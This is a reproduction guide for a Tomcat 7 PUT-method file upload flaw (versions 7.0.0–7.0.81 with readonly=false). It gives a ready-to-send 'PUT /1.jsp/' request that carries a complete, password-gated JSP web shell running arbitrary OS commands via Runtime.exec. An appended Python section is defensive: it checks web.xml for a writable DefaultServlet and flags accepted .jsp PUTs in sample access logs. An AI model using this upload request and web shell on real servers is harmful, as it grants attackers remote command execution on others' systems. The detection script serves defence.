1. Exploitation prerequisites:
Tomcat version: 7.0.0 - 7.0.81
readonly is set to false in the configuration file conf/web.xml
The PUT method is enabled
2. Reproduction steps:
Use Burp to capture any GET request, change GET to PUT, and upload a JSP file:
PUT /1.jsp/ HTTP/1.1
Host: (host of the target site)
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("pwd".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("hello");}%>
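As an added defender-side example (not part of the original write-up), the script below checks the two things an operator would want after reading the above: whether conf/web.xml leaves the DefaultServlet writable (readonly=false), and whether the access log records PUT requests aimed at .jsp resources, including the trailing-slash form /1.jsp/ used in the reproduction. The web.xml fragment and log lines are constructed samples; the XML helper deliberately ignores namespaces, since Tomcat's web.xml declares a version-specific one.

```python
import re
import xml.etree.ElementTree as ET

# Constructed conf/web.xml fragment: DefaultServlet with the weak setting readonly=false.
WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""

# Constructed Tomcat access-log lines (common log format).
LOGS = """\
10.0.0.5 - - [12/Dec/2019:10:15:32 +0800] "GET /index.jsp HTTP/1.1" 200 1234
10.0.0.9 - - [12/Dec/2019:10:16:01 +0800] "PUT /1.jsp/ HTTP/1.1" 201 -
10.0.0.7 - - [12/Dec/2019:10:17:10 +0800] "PUT /upload/report.txt HTTP/1.1" 204 -
"""

def _local(tag: str) -> str:
    """Strip the XML namespace so the check works across Tomcat web.xml versions."""
    return tag.rsplit("}", 1)[-1]

def _child_text(elem, name: str) -> str:
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return ""

def default_servlet_writable(web_xml_text: str) -> bool:
    """True only if the DefaultServlet explicitly sets readonly=false.
    Tomcat defaults to readonly=true, so a missing init-param counts as safe."""
    root = ET.fromstring(web_xml_text)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        if not _child_text(servlet, "servlet-class").endswith("DefaultServlet"):
            continue
        for param in servlet:
            if _local(param.tag) == "init-param" and _child_text(param, "param-name") == "readonly":
                return _child_text(param, "param-value").lower() == "false"
    return False

LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def flag_jsp_puts(log_text: str):
    """Return (path, status) for PUT requests whose path names a .jsp resource;
    a 201/204 status means the server accepted the write."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m and m.group("method") == "PUT" and ".jsp" in m.group("path").split("?", 1)[0].lower():
            hits.append((m.group("path"), int(m.group("status"))))
    return hits
```

Run it against the real conf/web.xml and the access log of a Tomcat 7 host to confirm readonly is true and that no .jsp PUT was accepted.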